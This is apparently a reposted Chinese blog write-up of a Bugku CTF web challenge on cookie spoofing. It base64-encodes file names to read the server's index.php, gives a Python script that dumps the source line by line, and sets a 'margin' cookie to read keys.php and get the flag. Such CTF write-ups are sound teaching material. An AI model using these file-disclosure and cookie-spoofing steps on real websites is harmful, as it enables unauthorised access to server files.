Bugkuctf web cookie欺骗

编程入门 行业动态 更新时间:2024-10-20 03:43:00

<a href=https://www.elefans.com/category/jswz/34/1767783.html style=Bugkuctf web cookie欺骗"/>

Bugkuctf web cookie欺骗

题目链接

又有新东西啦

打开
发现没啥用,查看源码也没什么

注意到URL上有一串类似base64编码的东西

解码

习惯性访问一下

那下面又该咋办呢???
URL里filename有参数,line没有参数
要不试一试价格参数?

line=1,啥都没有

注意到filename 的参数是base64编码后的

那再把1,2,3编码一波试试?

又回去了啥都没有。。。

懵逼中。。。

看了一下别人的writeup
注意到一个逻辑

php解析的时候 line 表示的是行号,filename是对于文件内容的读取,所以,直接构造一个逻辑矛盾,让filename去读自己即读index.php

还是要编码一下,毕竟filename都是编码了的

于是
显然随着line行数变化,代码也出来了

这里有两种方式

第一种自己一次输入行号,然后copy出来

第二种是用python写个小脚本出来,就个人而言,选择第二种好一些吧

附上脚本

import requests
a=30
for i in range(a):url="http://123.206.87.240:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw" r=requests.get(url)print (r.text)

找到的代码

<?phperror_reporting(0);$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");$line=isset($_GET['line'])?intval($_GET['line']):0;if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");$file_list = array('0' =>'keys.txt','1' =>'index.php',);if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){      $file_list[2]='keys.php';}
//看看这个地方!!!if(in_array($file, $file_list)){$fa = file($file);echo $fa[$line];}?>

代码相关函数
?是条件语句
intval()
函数用于获取变量的整数值
header()
函数向客户端发送原始的 HTTP 报头。这里是跳转到一个新地址
array()
创建一个新数组
file()
把文件读入数组

接下来构造
filename=a2V5cy5waHA=
Cookie:margin=margin
就行啦

更多推荐

Bugkuctf web cookie欺骗

本文发布于:2023-07-28 15:44:13,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1239249.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:Bugkuctf   web   cookie

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!